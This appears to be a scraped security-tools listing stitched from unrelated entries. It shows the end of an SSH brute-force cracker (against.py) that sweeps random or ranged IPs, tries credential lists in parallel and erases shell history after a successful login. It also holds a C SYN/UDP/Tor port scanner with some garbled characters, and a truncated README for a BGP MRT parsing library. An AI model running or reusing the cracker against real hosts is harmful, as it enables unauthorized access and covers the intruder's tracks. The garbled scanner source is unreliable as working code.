hyphen = parted.find('-') if hyphen != -1: rsa = int(parted[:hyphen]) rsb = int(parted[1+hyphen:]) + 1 else: rsa = int(parted) rsb = int(parted) + 1 return (rsa, rsb) # call thread_scan() with target ip addresses def ip_range(args): targets = check_targets(args.i) rsa, rsb = handle_ip_range(targets) print '[*] scanning %s for ssh services' % targets counter = 0 for i in range(rsa[0], rsb[0]): for j in range(rsa[1], rsb[1]): for k in range(rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): target = '%d.%d.%d.%d' % (i, j, k, l) counter += 1 scan_output(counter) thread_scan(args, target) # waiting for the last running threads active_threads(1, 0.1) scan_output(counter) print '\n[*] finished scan' # create ip addresses def randip(): rand = range(4) for i in range(4): rand = random.randrange(0, 256) # exclude 127.x.x.x if rand[0] == 127: randip() ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3]) return ipadd # create random ip addresses def rand_ip(args): i = 0 print '[*] scanning random ips for ssh services' while len(HOSTLIST) < int(args.r): i += 1 scan_output(i) thread_scan(args, randip()) # waiting for the last running threads active_threads(1, 1) scan_output(i) print '\n[*] finished scan.' # checks if given filename by parameter exists def file_exists(filename): try: open(filename).readlines() except IOError: print '[!] ERROR: cannot open file \'%s\'' % filename sys.exit(1) # read-in a file with ip addresses def ip_list(ipfile): file_exists(ipfile) targets = open(ipfile).readlines() for target in targets: HOSTLIST.append(target) # connect to target and try to login def crack(target, port, user, passwd, outfile, timeo, i): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) user = user.replace('\n', '') passwd = passwd.replace('\n', '') try: ssh.connect(target, port=port, username=user, password=passwd, timeout=timeo, pkey=None, allow_agent=False) time.sleep(3) try: ssh.exec_command('unset HISTFILE ; unset HISTSIZE') time.sleep(1) ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \ '|| cat /proc/version') output = 'kernel: %s' \ % (ssh_stdout.readlines()[0].replace('\n', '')) except: output = 'info: maybe a honeypot or false positive' login = '[+] login found for %s | %s:%s\n' \ '[!] %s' % (target, user, passwd, output) print login if outfile: write_to_file(outfile, login + '\n') ssh.close() os._exit(0) except paramiko.AuthenticationException, e: ssh.close() exception = str(e) if '[\'publickey\']' in exception: print '[-] key authentication only - ' \ 'stopped attack against %s' % (target) os._exit(1) elif '\'keyboard-interactive\'' in exception: print '[-] %s requires \'keyboard-interactive\' handler' % (target) os._exit(1) except: ssh.close() # after 3 timeouts per request the attack against $target will stopped if i < 3: i += 1 # reconnect after random seconds (between 0.6 and 1.2 sec) randtime = random.uniform(0.6, 1.2) time.sleep(randtime) crack(target, port, user, passwd, outfile, timeo, i) else: print '[-] too many timeouts - stopped attack against %s' % (target) os._exit(1) # create 'x' number of threads and call crack() def thread_it(target, args): port = int(args.p) user = args.u userlist = args.U password = args.l passlist = args.L outfile = args.o timeout = float(args.T) threads = int(args.t) if userlist: users = open(userlist).readlines() else: users = [user] if passlist: passwords = open(passlist).readlines() else: passwords = [password] # try/except looks dirty but we need it :/ try: for user in users: for password in passwords: Run = threading.Thread(target=crack, args=(target, port, user, password, outfile, timeout, 0,)) Run.start() # checks that we a max number of threads active_threads(threads, 0.01) time.sleep(0.1) # waiting for the last running threads active_threads(1, 1) except KeyboardInterrupt: os._exit(1) # create 'x' child processes (child == cracking routine for only one target) def fork_it(args): threads = int(args.t) childs = int(args.f) len_hosts = len(HOSTLIST) print '[*] attacking %d target(s)\n' \ '[*] cracking up to %d hosts parallel\n' \ '[*] threads per host: %d' % (len_hosts, childs, threads) i = 1 for host in HOSTLIST: host = host.replace('\n', '') print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts) hostfork = multiprocessing.Process(target=thread_it, args=(host, args)) hostfork.start() # checks that we have a max number of childs while len(multiprocessing.active_children()) >= childs: time.sleep(0.001) time.sleep(0.001) i += 1 # waiting for child processes while multiprocessing.active_children(): time.sleep(1) # \(0.o)/ def empty_hostlist(): if len(HOSTLIST) == 0: print '[-] found no targets to attack!' finished() sys.exit(1) # output when against.py finished all routines def finished(): print '[*] game over!!!' def main(): banner() args = argspage() if args.U: file_exists(args.U) if args.L: file_exists(args.L) if args.o: test_file(args.o) if args.O: test_file(args.O) if args.i: ip_range(args) unsort_hostlist() elif args.I: ip_list(args.I) else: rand_ip(args) time.sleep(0.1) empty_hostlist() fork_it(args) finished() if __name__ == '__main__': HOSTLIST = [] try: logging.disable(logging.CRITICAL) main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.2) os._exit(1) http://www.nullsecurity.net/tools/cracker/against.py

Netscan is a TCP and UDP SYN scanner that can also leverage Tor. Author: Domenico Pinto gcc -lpthread netscan.c -o netscan Tcp/Udp/Tor port scanner with: synpacket, connect TCP/UDP and socks5(tor connection) ./netscan [*] Network Scanner v1.0 starting at 09:26:50 Mar 9 2014 [*] -c | --connect Tcp protocol -s | --syn Syn packet scanner -t | --tor Tor scanner default 127.0.0.1:9050 -u | --udp Udp protocol -b | --banner Parse service banner -p | --port Port method A, A-B, A,B,C,D -d | --delay Delay synpack in ms [min: 50000] -v | --verbose Verbose output -h | --help Print help menu Example: scan -s google.it scan -c google.it scan -t google.it scan -c -b google.it scan -c -p1-100 google.it scan -c -p1,2,3,4 google.it #include <math.h> #include <time.h> #include <stdio.h> #include <errno.h> #include <netdb.h> #include <fcntl.h> #include <ctype.h> #include <getopt.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <signal.h> #include <net/if.h> #include <pthread.h> #include <termios.h> #include <sys/mman.h> #include <sys/time.h> #include <sys/wait.h> #include <sys/ioctl.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/udp.h> #include <netinet/ip_icmp.h> #include <netinet/in_systm.h> #define LPORT 1 #define HPORT 65535 #define TCPSZ sizeof(struct iphdr)+sizeof(struct tcphdr) #define PSESZ sizeof(struct pseudohdr)+sizeof(struct tcphdr) #define TORPORT 9050 #define TORCTRL 9051 #define LOCALHOST "127.0.0.1" #define SOCKS5 "\x05\x01\x00" #define UDP_RESEND 6 #define UDP_PACKET 4096 /* global var */ static int verbose; static int syn; static int conn; static int tor; static int normal; static int progress; static int rangeport; static int singleport; static int specificport; static int udp; static int webserver; static int banserv; unsigned int delay=50000, timeout=1, timeout_s=1, timeout_u=200; unsigned short min, max, port; unsigned short index_p=0, index_o=0, index_c=0, index_f=0; unsigned short ports[HPORT], open_p[HPORT], closed_p[HPORT], filtred_p[HPORT]; char *hostname, *eth0, *ipsource; typedef enum { false, true } bool; /* struct tcp syn packet */ struct pseudohdr { in_addr_t src; in_addr_t dst; char padd; char proto; unsigned short len; }; /* struct progress bar */ typedef struct { char start; char end; char block; char cursor; unsigned int width; double max; bool percent; bool update; } bar; /* setup char for progress bar */ void setupbar(bar * set) { set->start = '['; set->end = ']'; set->block = '='; set->cursor = '>'; set->percent = true; set->update = false; set->max = 100; set->width = 40; } /* Progress bar */ void progressbar(double pos, bar * set) { unsigned int print = (unsigned int)(set->width*pos/set->max); unsigned count; if(set->update) { for(count=set->width+2+(set->percent?5:0); count; count--) putchar('\b'); } else set->update = true; putchar(set->start); count = set->width; for(; print>1; print--, count--) putchar(set->block); putchar((set->max == pos) ? set->block : set->cursor); count--; for(; count; count--) putchar(' '); putchar(set->end); if(set->percent) printf(" %3d%%", (int)(100*pos/set->max)); fflush(stdout); } void help() { //printf("[*] Network Scanner v1.0 helper %s %s\n",__TIME__, __DATE__); printf(" -c | --connect\tTcp protocol\n"); printf(" -s | --syn\t\tSyn packet scanner\n"); printf(" -t | --tor\t\tTor scanner default 127.0.0.1:9050\n"); printf(" -u | --udp\t\tUdp protocol\n"); printf(" -b | --banner\t\tParse service banner\n"); printf(" -p | --port\t\tPort method A, A-B, A,B,C,D\n"); printf(" -d | --delay\t\tDelay synpack in ms [min: 50000]\n"); printf(" -v | --verbose\tVerbose output\n"); printf(" -h | --help\t\tPrint help menu\n\n"); printf(" Example: scan -s google.it\n"); printf(" scan -c google.it\n"); printf(" scan -t google.it\n"); printf(" scan -c -b google.it\n"); printf(" scan -c -p1-100 google.it\n"); printf(" scan -c -p1,2,3,4 google.it\n"); exit(0); } void ctrlc(int sig) { printf("\n\n CTRL+C intercepted exit scanner\n"); exit(0); } /* error control on port value */ int portcontrol(char *arg) { if(strstr(arg,"-") != NULL) { rangeport = 1; sscanf(arg, "%hu%*c%hu", &min,&max); if(min >= max || min > HPORT-1 || max > HPORT || max == LPORT) { printf(" [RANGE-ERROR] invalid port range %s\n\n", arg); exit(0); } return 0; } if(strstr(arg,",") != NULL) { specificport = 1; char *p; p = strtok(arg, ","); while(p != NULL) { ports[index_p++] = (unsigned short)atoi(p); p = strtok(NULL, ","); } return 0; } singleport = 1; min = atoi(arg); return 0; } int service() { struct servent *se; int i=0; if(!udp) { while((se = getservent())) { if(strcmp(se->s_proto, "tcp") == 0) i++; } return i; } if(udp) { while((se = getservent())) { if(strcmp(se->s_proto, "tcp") == 0) i++; } return i; } return -1; } char* resolveHost (char *host) { struct hostent *he; struct in_addr a; if((he = gethostbyname(host))) { while (*he->h_addr_list) { bcopy(*he->h_addr_list++, (char *) &a, sizeof(a)); return inet_ntoa(a); } } return 0; } int cmpfunc(const void *a, const void * { return (*(unsigned short*)a - *(unsigned short*); } /* remove duplicate */ unsigned short* rmdup(unsigned short *v, int size) { int i,index=0; unsigned short *new_v = (unsigned short*)malloc(size*sizeof(unsigned short)); if (size == 1) new_v[0] = v[0]; else { for (i=1; i<size; i++) { if (v != v[i-1]) new_v[index++] = v[i-1]; } } return new_v; } /* get banner service on open port */ char *bannerservice(unsigned short bport) { int sock, conn, ctra, ctrb, sendbytes, rcvdbytes; char banner[1000], *httpdsptr, *httpdbptr, ip_addr[16]; struct sockaddr_in ban; struct hostent *host; struct timeval tm; tm.tv_sec = 1; tm.tv_usec = 0; host = gethostbyname(hostname); bzero(banner,1000); strcpy(ip_addr, (char *)inet_ntoa(*((struct in_addr *)host->h_addr))); if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) return ("N.B. error"); if(setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&tm, sizeof(struct timeval)) == -1) return ("N.B. error"); ban.sin_family=AF_INET; ban.sin_port=htons(bport); ban.sin_addr.s_addr=inet_addr(hostname); if((conn = connect(sock,(struct sockaddr *)&ban, sizeof(struct sockaddr))) == -1) return ("N.B. error"); if(bport == 80) sendbytes = send(sock, "HEAD / HTTP/1.0\n\n", 19, 0); rcvdbytes = recv(sock, banner, 1000, 0); if(bport == 80) { httpdsptr = strstr(banner,"Server"); for(ctra=0; ctra!=strlen(httpdsptr); ctra++) { if(httpdsptr[ctra] == '\n') { httpdsptr[ctra] = '\0'; break; } } httpdbptr = (char *)malloc(ctra-8); for(ctrb=0; ctrb!=ctra; ctrb++) { httpdbptr[ctrb] = httpdsptr[ctrb+8]; if(httpdsptr[ctrb+8] == '\0') { break; } } printf("["); if(strlen(httpdbptr) > 0) { httpdbptr[strcspn(httpdbptr,"\r")] = '\0'; printf("%s", httpdbptr); } else printf("N.d"); printf("]"); fflush(stdout); } else { printf("["); if(strlen(banner) > 0) { banner[strcspn(banner,"\r")] = '\0'; printf("%s", banner); } else printf("N.d."); printf("]"); fflush(stdout); } close(sock); return 0; } /* statistics port status */ int statistic() { struct servent *se; unsigned short *new_o,i,total; new_o = rmdup(open_p, index_o+1); for(i=0; i<index_o; i++); total=i; qsort(new_o, total, sizeof(unsigned short), cmpfunc); if(verbose) printf(" ****** STATISTICS ******\n\n"); for(i=0; i<total; i++) { if(new_o == 80) webserver = 1; if(verbose && !udp) printf(" OPEN\t%d", new_o); if(verbose && udp) printf(" OPEN|filtred\t%d", new_o); if(!verbose) printf(" OPEN\t%d", new_o); if(!udp) { if((se = getservbyport(htons(new_o), "tcp"))) printf("\t%s ", se->s_name); else printf("\tunknown "); } if(udp) { if((se = getservbyport(htons(new_o), "udp"))) printf("\t%s\n", se->s_name); else printf("\tunknown\n"); } if(banserv || (!banserv && new_o == 80)) { putchar('\t'); bannerservice(new_o); } putchar('\n'); } if(webserver && !banserv) { printf("\n[*] Webserver detected: "); bannerservice(80); } if(syn) { index_o = i; if(normal) index_f = 312-index_o-index_c; if(rangeport) { index_f = (max-min+1)-index_o-index_c; } } if(index_o == 0) printf("\n[*] ALL ports are closed."); printf("\n[*] Statistics: open %d closed %d filtred %d, ", index_o, index_c, index_f); return 0; } /* get last up interface (good if you use vpn) */ int interface() { char buf[8192],ip[iNET6_ADDRSTRLEN]; struct ifconf ifc; //= {0}; struct ifreq *ifr = NULL; int sck=0,nif=0,i=0; struct ifreq *item; struct sockaddr *addr; sck = socket(PF_INET, SOCK_DGRAM, 0); if(sck < 0) { perror("[ERROR] socket() interface: "); exit(0); } ifc.ifc_len = sizeof(buf); ifc.ifc_buf = buf; if(ioctl(sck, SIOCGIFCONF, &ifc) < 0) { perror("[ERROR] ioctl(SIOCGIFCONF): "); exit(0); } ifr = ifc.ifc_req; nif = ifc.ifc_len/sizeof(struct ifreq); for(i = 0; i < nif; i++) { item = &ifr; addr = &(item->ifr_addr); } eth0 = item->ifr_name; ipsource = (char*)inet_ntop(AF_INET,&(((struct sockaddr_in *)addr)->sin_addr),ip, INET6_ADDRSTRLEN); return 0; } unsigned short checksum (unsigned short *buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } /* check private ip (nmap function)*/ int checkip(char *ip) { unsigned int i1[4]; sscanf(ip,"%3u.%3u.%3u.%3u", &i1[0], &i1[1], &i1[2], &i1[3]); if (i1[0] >= 224) return 1; if (i1[0] >= 96 && i1[0] <= 127) return 1; if (i1[0] >= 70 && i1[0] <= 79) return 1; if (i1[0] >= 83 && i1[0] <= 95) return 1; if (i1[0] == 172 && i1[1] >= 16 && i1[1] <= 31) return 1; if (i1[0] == 192) { if (i1[1] == 168) return 1; else if (i1[1] == 0 && i1[2] == 2) return 1; } if (i1[0] == 169 && i1[1] == 254) return 1; if (i1[0] == 204 && i1[1] == 152 && (i1[2] == 64 || i1[2] == 65)) return 1; if (i1[0] == 255 && i1[2] == 255 && i1[3] == 255) return 1; return 0; } void synpacket(int sockfd, struct sockaddr_in sinaddr) { struct iphdr ip; struct tcphdr tcp; struct pseudohdr pseudo; int attrib; char *buff = (char*)malloc(TCPSZ); char tmp[sizeof(struct pseudohdr)+sizeof(struct tcphdr)]; memset(&ip, 0x0, sizeof(struct iphdr)); memset(&tcp, 0x0, sizeof(struct tcphdr)); ip.version = 4; ip.ihl = 5; ip.tot_len = TCPSZ; ip.id = htonl(12345); ip.ttl = 255; ip.protocol = IPPROTO_TCP; ip.saddr = inet_addr(ipsource); ip.daddr = inet_addr(hostname); ip.check = checksum((unsigned short*) &ip, ip.tot_len >> 1); tcp.source = (rand()%64511)+1024; tcp.dest = htons(port); tcp.seq = (rand()%0xFFFFFFFF); tcp.ack_seq = 0; tcp.doff = 5; tcp.syn = 1; tcp.window = htonl(0xffff); tcp.check = 0; sinaddr.sin_family = AF_INET; sinaddr.sin_port = htons(port); sinaddr.sin_addr.s_addr = inet_addr(hostname); attrib = 1; memset(tmp, 0x0, sizeof(struct pseudohdr)+sizeof(struct tcphdr)); memset(buff, 0x0, TCPSZ); pseudo.src = ip.saddr; pseudo.dst = ip.daddr; pseudo.padd = 0; pseudo.proto = ip.protocol; pseudo.len = htons(sizeof(struct tcphdr)); memcpy(tmp, &pseudo, sizeof(struct pseudohdr)); memcpy(tmp+sizeof(struct pseudohdr), &tcp, sizeof(struct tcphdr)); tcp.check = checksum ((ushort*) tmp, (PSESZ) >> 1); memcpy(buff, &ip, sizeof(struct iphdr)); memcpy(buff+sizeof(struct iphdr), &tcp, sizeof(struct tcphdr)); if (sendto (sockfd, buff, ip.tot_len, 0, (struct sockaddr *) &sinaddr, sizeof (sinaddr)) < 0) { fprintf (stderr,"*** Error in sendto: %s\n",strerror(errno)); exit(1); } usleep(delay); } void* ackSniffer(void *arg) { int sockfd; size_t sin_size=sizeof(struct sockaddr); struct iphdr ip; struct tcphdr tcp; struct sockaddr_in sock; char pack[HPORT]; if((sockfd=socket (PF_INET, SOCK_RAW, IPPROTO_TCP))<0) { fprintf (stderr,"*** Fatal - Unable to create a raw socket: %s\n",strerror(errno)); exit(-1); } sock.sin_family=AF_INET; sock.sin_port=0; sock.sin_addr.s_addr=inet_addr(hostname); while(1) { memset (&ip,0x0,sizeof(struct iphdr)); memset (&tcp,0x0,sizeof(struct tcphdr)); if(recvfrom(sockfd, pack, sizeof(pack), 0, (struct sockaddr*) &sock, &sin_size)<0) { fprintf (stderr,"*** Fatal - Error in recvfrom(): %s\n",strerror(errno)); exit(-2); } memcpy (&ip,pack,sizeof(struct iphdr)); memcpy (&tcp,pack+sizeof(struct iphdr),sizeof(struct tcphdr)); if (ip.saddr == inet_addr(hostname) && tcp.ack && !tcp.rst && ntohs(tcp.source)){//>= min && ntohs(tcp.source) <= max) { if(verbose) { printf (" [OPEN] ACK sniffed %s:%u\t [winsize %d] [ttl %d]\n",hostname,ntohs(tcp.source),tcp.window,ip.ttl); fflush(stdout); } open_p[index_o++] = ntohs(tcp.source); } else if (ip.saddr == inet_addr(hostname) && tcp.ack && tcp.rst) { closed_p[index_c++] = ntohs(tcp.source); } } pthread_exit(0); } int setupsock(struct sockaddr_in sock) { struct timeval tm; int sd, attrib = 1; if(syn) { pthread_t t; if(pthread_create (&t,NULL,ackSniffer,NULL)) { fprintf (stderr," [ERROR-ACKSNIFFER] Thread process create: [%s]\n",strerror(errno)); exit(0); } if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) { fprintf(stderr, " [sYN - SOCKET] Unable to create raw socket: [%s]", strerror(errno)); exit(0); } if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &attrib, sizeof(attrib)) < 0) { fprintf(stderr, " [sYN - SOCKOPT] Error in setsockopt: [%s]\n",strerror(errno)); exit(0); } } if(conn || tor) { tm.tv_sec = timeout; tm.tv_usec = 0; sock.sin_family = AF_INET; if(conn) { sock.sin_port = htons(port); sock.sin_addr.s_addr = inet_addr(hostname); } if(tor) { sock.sin_port = htons(TORPORT); sock.sin_addr.s_addr = inet_addr(LOCALHOST); } if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { fprintf(stderr, " [CONNECT - ERROR] Unable to create socket: [%s]", strerror(errno)); exit(0); } if(conn) { fd_set fdset; fcntl(sd, F_SETFL, O_NONBLOCK); connect(sd, (struct sockaddr *)&sock, sizeof(sock)); FD_ZERO(&fdset); FD_SET(sd, &fdset); if(select(sd+1, NULL, &fdset, NULL, &tm) == 1) { int so_error; socklen_t len = sizeof(so_error); getsockopt(sd, SOL_SOCKET, SO_ERROR, &so_error, &len); if(so_error == 0) { if(verbose) printf(" OPEN\t\t%d\n", port); open_p[index_o++] = port; } else { if(verbose) printf(" CLOSED\t\t%d\n", port); closed_p[index_c++] = port; } } else { if(verbose) printf(" FILTRED\t\t%d\n", port); filtred_p[index_f++] = port; } close(sd); return 0; } if(tor) { if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &attrib, 4) < 0) { fprintf(stderr," [TOR - SETSOCKOPT] SO_REUSEADDR: [%s]\n",strerror(errno)); exit(0); } if(setsockopt(sd, SOL_SOCKET, SO_RCVTIMEO, (char*)&tm, sizeof(struct timeval)) < 0) { fprintf (stderr," [TOR - SETSOCKOPT] SO_RCVTIMEO: [%s]\n",strerror(errno)); exit(0); } if(connect(sd, (struct sockaddr*)&sock, sizeof(sock)) != 0) { fprintf(stderr," [TOR - CONNECT] Connect 127.0.0.1:9050: [%s]\n",strerror(errno)); exit(0); } } } return sd; } void udpscan(unsigned short port) { struct sockaddr_in myudp; char buff[] = "0x0x0x0x0x0x0x0x0x0"; int udpsock, rawsock, retry, retval, iplen; fd_set r; struct timeval mytimeout; struct icmp *packet; struct ip *iphdr; unsigned char recvbuff[uDP_PACKET]; if((udpsock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) { perror(" [ERROR] Udp Socket: "); exit(-1); } if((rawsock = socket(AF_INET,SOCK_RAW,IPPROTO_ICMP)) < 0) { perror(" [ERROR] Icmp raw_sock: "); exit(-1); } mytimeout.tv_sec = 2; mytimeout.tv_usec = 0; myudp.sin_family = AF_INET; myudp.sin_port = htons(port); myudp.sin_addr.s_addr = inet_addr(hostname); retry = 0; while(retry++ < UDP_RESEND) { if((sendto(udpsock,buff,sizeof(buff),0x0,(struct sockaddr *)&myudp,sizeof(myudp))) < 0) { perror(" [ERROR] Udp Sendto: "); exit(-1); } FD_ZERO(&r); FD_SET(rawsock,&r); retval = select((rawsock+1),&r,NULL,NULL,&mytimeout); if(retval) { if((recvfrom(rawsock,&recvbuff,sizeof(recvbuff),0x0,NULL,NULL)) < 0) { perror(" [ERROR] Udp Recv: "); exit(-1); } iphdr = (struct ip *)recvbuff; iplen = iphdr->ip_hl << 2; packet = (struct icmp *)(recvbuff + iplen); if((packet->icmp_type == ICMP_UNREACH) && (packet->icmp_code == ICMP_UNREACH_PORT)) break; } else continue; } if(retry >= UDP_RESEND) { open_p[index_o++] = port; if(verbose) { printf(" OPEN|filtred\t%d\n", port); fflush(stdout); } } else closed_p[index_c++] = port; } int torscan() { struct sockaddr_in torsocks; struct servent *service; unsigned short portserv; char *buf = calloc(1024, sizeof(char)); short l = strlen(hostname); short t; int x,sockt; if(checkip(hostname)) { printf(" [TOR-SOCKS5] Reject connection to private address\n"); exit(0); } sockt = setupsock(torsocks); write(sockt, SOCKS5, 3); read(sockt, buf, 1024); if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) { printf("Socks5 error!\n"); exit(0); } buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; buf[4] = l; for(x=0; x<l; x++) buf[5+x] = hostname[x]; x=l+5; t = htons(port); memcpy((buf+x), &t, 2); write(sockt, buf, x+2); read(sockt, buf, 1024); if((buf[0] == 0x05) && (buf[1] == 0x00)) { portserv = htons(port); if(verbose) { printf(" OPEN\t\t%d",port); fflush(stdout); } if((service = getservbyport(portserv,"tcp"))) { printf("\t(%s)\n",service->s_name); fflush(stdout); } else { printf("\t(unknown)\n"); fflush(stdout); } open_p[index_o++] = port; close(sockt); return 0; } if(verbose) { printf(" CLOSED|FILTRED\t\t%d\n",port); fflush(stdout); } closed_p[index_c++] = port; close(sockt); return 0; } int main(int argc, char **argv) { struct sockaddr_in sock; struct servent *se; struct timeval start, end; struct winsize term; char *portopt, *method; unsigned int mtime, seconds, useconds; int i, c, sockfd; progress = 1; bar progress; setupbar(&progress); printf("[*] Network Scanner v1.0 starting at %s %s [*]\n",__TIME__,__DATE__); srand ((unsigned) time(NULL)); gettimeofday(&start, NULL); signal(SIGINT, ctrlc); while (1) { static struct option long_options[] = { //{"verbose", no_argument, &verbose, 1 }, {"verbose", no_argument, 0, 'v'}, {"syn", no_argument, 0, 's'}, {"connect", no_argument, 0, 'c'}, {"tor", no_argument, 0, 't'}, {"udp", no_argument, 0, 'u'}, {"banner", no_argument, 0, 'b'}, {"help", no_argument, 0, 'h'}, {"delay", required_argument, 0, 'd'}, {"port", required_argument, 0, 'p'}, {0, 0, 0, 0} }; int option_index = 0; c = getopt_long (argc, argv, "scthvubd:p:", long_options, &option_index); if (c == -1) break; switch © { case 0: if (long_options[option_index].flag != 0) break; printf ("option %s", long_options[option_index].name); if (optarg) printf (" with arg %s", optarg); break; case 's': if(getuid() != 0) { printf(" [ERROR-PERMISSION] You must to be root\n"); exit(0); } syn = 1; method = "synpacket"; interface(); sockfd = setupsock(sock); break; case 'c': conn = 1; method = "connect"; break; case 't': tor = 1; method = "tor"; break; case 'u': udp = 1; method = "udp"; break; case 'b': banserv = 1; break; case 'd': delay = atoi(optarg); break; case 'p': portcontrol(optarg); portopt = optarg; break; case 'v': verbose = 1; //progress = 0; break; case 'h': help(); case '?': help(); break; default: help(); } } if (optind < argc) { while (optind < argc) hostname = argv[optind++]; } else help(); if(!(hostname = resolveHost(hostname))) { fprintf (stderr,"\n [RESOLUTION-ERROR] Unable to resolve: %s\n\n",hostname); exit(0); } if ((syn && tor && conn && udp) || (syn && conn) || (syn && tor) || (tor && conn)) help(); if ((udp && syn && conn) || (udp && syn) || (udp && conn) || (udp && tor)) help(); if (!syn && !tor && !conn && !udp) { if(getuid() == 0) { syn = 1; method = "synpacket"; interface(); sockfd = setupsock(sock); } else { conn = 1; method = "connect"; } } if (!rangeport && !singleport && !specificport) normal = 1; if(!verbose) { ioctl(0, TIOCGWINSZ, &term); if(term.ws_col < progress.width+10) verbose = 1; } if (rangeport) { printf(" Host: %s Method: %s Port: [%d-%d]\n\n", hostname, method, min, max); if(!verbose) { printf(" "); progress.max = max-min; } for(port=min, i=1; port<max; port++, i++) { if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd, sock); if(udp) udpscan(port); if(!verbose) progressbar(i, &progress); } } if (specificport) { printf(" Host: %s Method: %s Port: [", hostname, method); for(i=0; i<index_p; i++) { printf("%d", ports); if(i != index_p-1) printf(","); } puts("]\n"); if(!verbose) { printf(" "); progress.max = i-1; } for(i=0; i<index_p; i++) { port = ports; if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd, sock); if(udp) udpscan(port); if(!verbose) progressbar(i, &progress); } } if (singleport) { printf(" Host: %s Method: %s Port: [%s]\n", hostname, method, portopt); port = min; if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd,sock); if(udp) udpscan(port); } if (normal) { printf(" Host: %s Method: %s ports: [/etc/services]\n\n", hostname, method); if(!verbose) { printf(" "); progress.max = 312; i = 0; } while((se = getservent())) { if(udp) { if(strcmp(se->s_proto, "udp") == 0) { port = ntohs(se->s_port); udpscan(port); if(!verbose) progressbar(++i, &progress); } } if(syn || conn || tor) { if(strcmp(se->s_proto, "tcp") == 0) { port = ntohs(se->s_port); if(conn) setupsock(sock); if(tor) torscan(); if(syn) synpacket(sockfd, sock); if(!verbose) progressbar(++i, &progress); } } } } printf("\n\n"); gettimeofday(&end, NULL); seconds = end.tv_sec - start.tv_sec; useconds = end.tv_usec - end.tv_usec; mtime = ((seconds)*1000 + useconds/1000.0) +0.5; statistic(); if((seconds/60) > 0) printf("scanned in %d.%d.%d min\n", seconds/60,seconds%60,abs(mtime-(seconds*1000))); else printf("scanned in %d.%d sec\n", seconds%60, abs(mtime-(seconds*1000))); return 0; }

mrtparse is a module to read and analyze the MRT format data. The MRT format data can be used to export routing protocol messages, state changes, and routing information base contents, and is standardized in RFC6396. Programs like Quagga / Zebra, BIRD, OpenBGPD and PyRT can dump the MRT fotmat data. urrently supported types Table_Dump(12), Table_Dump_V2(13), BGP4MP(16), BGP4MP_ET(17) Requirements Python2?Python3 Download git command $ git clone https://github.com/YoshiyukiYamauchi/mrtparse.git Browser Access https://github.com/YoshiyukiYamauchi/mrtparse.git, and click 'Download ZIP'. Install $ cd <Clone Directory> $ python setup.py install running install running build running build_py running install_lib copying build/lib/mrtparse.py -> /Library/Python/2.7/site-packages byte-compiling /Library/Python/2.7/site-packages/mrtparse.py to mrtparse.pyc running install_egg_info Writing /Library/Python/2.7/site-packages/mrtparse-0.8-py2.7.egg-info Usage from mrtparse import * or import mrtparse Programming First, import the module. from mrtparse import * And pass a MRT format data as a filepath string or file object to a class Reader(). It is also supported gzip and bzip2 format. You can retrieve each entry from the returned object using a loop and then process it. d = Reader(f) for m in d: <statements> Example These scripts are included in 'examples' directory. print_all.py Description It displays the contents of a MRT format file. Usage print_all.py <path to the file> Result --------------------------------------------------------------- MRT Header Timestamp: 1392828028(2014-02-20 01:40:28) Type: 16(BGP4MP) Subtype: 5(BGP4MP_STATE_CHANGE_AS4) Length: 24 BGP4MP_STATE_CHANGE_AS4 Peer AS Number: 100 Local AS Number: 64512 Interface Index: 0 Address Family: 1(AFI_IPv4) Peer IP Address: 192.168.1.21 Local IP Address: 192.168.1.100 Old State: 5(OpenConfirm) New State: 6(Established) --------------------------------------------------------------- MRT Header Timestamp: 1392828028(2014-02-20 01:40:28) Type: 16(BGP4MP) Subtype: 4(BGP4MP_MESSAGE_AS4) ... exabgp_conf.py Description It converts MRT format to 'exabgp' config format and displays it. Usage exabgp_conf.py <path to the file> Result neighbor 192.168.1.100 { router-id 192.168.0.20; local-address 192.168.1.20; local-as 65000; peer-as 64512; graceful-restart; static { route 1.0.0.0/24 origin IGP as-path [29049 15169 ] next-hop 192.168.1.254; route 1.0.4.0/24 origin IGP as-path [29049 6939 7545 56203 ] next-hop 192.168.1.254; route 1.0.5.0/24 origin IGP as-path [29049 6939 7545 56203 ] next-hop 192.168.1.254; route 1.0.6.0/24 origin IGP as-path [29049 20485 4826 38803 56203 ] community [20485:31701] next-hop 192.168.1.254; route 1.0.7.0/24 origin IGP as-path [29049 20485 4826 38803 56203 ] community [20485:31701] next-hop 192.168.1.254; route 1.0.20.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254; route 1.0.22.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254; route 1.0.24.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254; route 1.0.26.0/23 origin IGP as-path [29049 2914 2519 ] community [2914:410 2914:1403 2914:2401 2914:3400] next-hop 192.168.1.254; route 1.0.28.0/22 origin IGP 